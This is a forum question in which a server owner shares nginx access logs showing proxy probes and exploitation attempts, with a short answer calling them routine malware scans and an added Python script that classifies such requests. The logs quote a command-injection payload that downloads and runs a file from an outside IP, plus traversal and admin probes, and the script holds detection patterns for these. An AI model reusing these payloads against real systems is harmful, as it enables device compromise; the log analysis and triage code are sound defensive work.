Nginx automatically forwards a domain that I did not configure

I set up a new server on DigitalOcean. I forgot to enable the firewall for a day, so I checked the nginx log and saw these lines:

120.216.207.173 - - [11/Dec/2019:01:42:29 +0000] "GET http://ah.sina.com.cn/ HTTP/1.1" 200 612 "http://ah.sina.com.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
185.53.88.5 - - [11/Dec/2019:02:07:44 +0000] "GET //admin/config.php?password%5B0%5D=ZIZO&username=admin HTTP/1.1" 400 37 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.4.3.el7.x86_64"
94.102.49.104 - - [11/Dec/2019:02:13:57 +0000] "GET ../../proc/ HTTP" 400 173 "-" "-"
120.216.207.173 - - [11/Dec/2019:02:52:07 +0000] "GET http://www.jaycn.com/ HTTP/1.1" 200 612 "http://www.jaycn.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:02:52:15 +0000] "GET http://www.enet.com.cn/ HTTP/1.1" 200 612 "http://www.enet.com.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:02:52:19 +0000] "GET http://www.rising.cn/ HTTP/1.1" 200 612 "http://www.rising.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
208.97.139.112 - - [11/Dec/2019:02:52:46 +0000] "POST /stainfo.cgi?ifname=eth0;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0" 404 169 "-" "-"
120.216.207.173 - - [11/Dec/2019:03:27:29 +0000] "GET http://www.xinhuanet.com/ HTTP/1.1" 200 612 "http://www.xinhuanet.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:33 +0000] "GET http://blog.sina.com.cn/ HTTP/1.1" 200 612 "http://blog.sina.com.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:36 +0000] "GET http://www.guokr.com/ HTTP/1.1" 200 612 "http://www.guokr.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:41 +0000] "GET http://www.ecitic.com/ HTTP/1.1" 200 612 "http://www.ecitic.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

I would like to know how my nginx can return a domain that is not configured. Does this mean nginx was hacked?

Answer 1

These are just malware exploitation attempts, which are common and normal.

The IP address indicates that it is this malware: https://twitter.com/carbreal/status/1205059129619947520/photo/3
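An added example, not part of the original question or answer: a small Python triage of the request patterns visible in the log above (absolute-URI proxy probes, path traversal, command injection), plus a check of whether the proxy probes were answered with one identical page. The sample lines are constructed with documentation IP ranges and example domains, and the label names and the same-size heuristic are assumptions of this example.

```python
import re
from urllib.parse import unquote

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*)" (\d{3}) (\d+) "[^"]*" "[^"]*"$')
EXEC_RE = re.compile(r'[;|`&]\s*(wget|curl|chmod|sh|bash)\b')

# Constructed sample lines modelled on the question's log (documentation IPs, example domains).
SAMPLE = [
    '192.0.2.10 - - [11/Dec/2019:01:42:29 +0000] "GET http://a.example/ HTTP/1.1" 200 612 "http://a.example/" "Mozilla/5.0"',
    '192.0.2.10 - - [11/Dec/2019:02:52:07 +0000] "GET http://b.example/ HTTP/1.1" 200 612 "http://b.example/" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Dec/2019:02:13:57 +0000] "GET ../../proc/ HTTP" 400 173 "-" "-"',
    '203.0.113.5 - - [11/Dec/2019:02:52:46 +0000] "POST /x.cgi?ifname=eth0;wget http://203.0.113.9/f; sh f HTTP/1.0" 404 169 "-" "-"',
    '192.0.2.44 - - [11/Dec/2019:05:00:00 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "curl/7.58.0"',
]

def classify(request):
    """Return labels for one request line; the target may contain spaces."""
    method, _, rest = request.partition(" ")
    target, _, proto = rest.rpartition(" ")
    labels = []
    if not target or not re.fullmatch(r"HTTP/\d\.\d", proto):
        labels.append("malformed-request-line")
        target = target or proto
    decoded = unquote(target)
    if re.match(r"(?i)https?://", decoded):      # absolute-form target, as sent to a forward proxy
        labels.append("absolute-uri-proxy-probe")
    if "../" in decoded:
        labels.append("path-traversal-probe")
    if EXEC_RE.search(decoded):                  # shell separator followed by a download/exec tool
        labels.append("command-injection-probe")
    return labels

def triage(lines):
    """Parse log lines into (ip, status, size, labels); skip unparseable lines."""
    out = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ip, request, status, size = m.groups()
            out.append((ip, int(status), int(size), classify(request)))
    return out

def proxy_probes_served_locally(rows):
    """Heuristic: 200s for different foreign hosts with one identical body size
    point to the server's own default page, not relayed content."""
    sizes = [size for _, status, size, labels in rows
             if status == 200 and "absolute-uri-proxy-probe" in labels]
    return len(sizes) > 1 and len(set(sizes)) == 1
```

Rows labelled as probes with a 4xx status were rejected by the server; proxy probes with a 200 deserve the size comparison before concluding anything was relayed.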
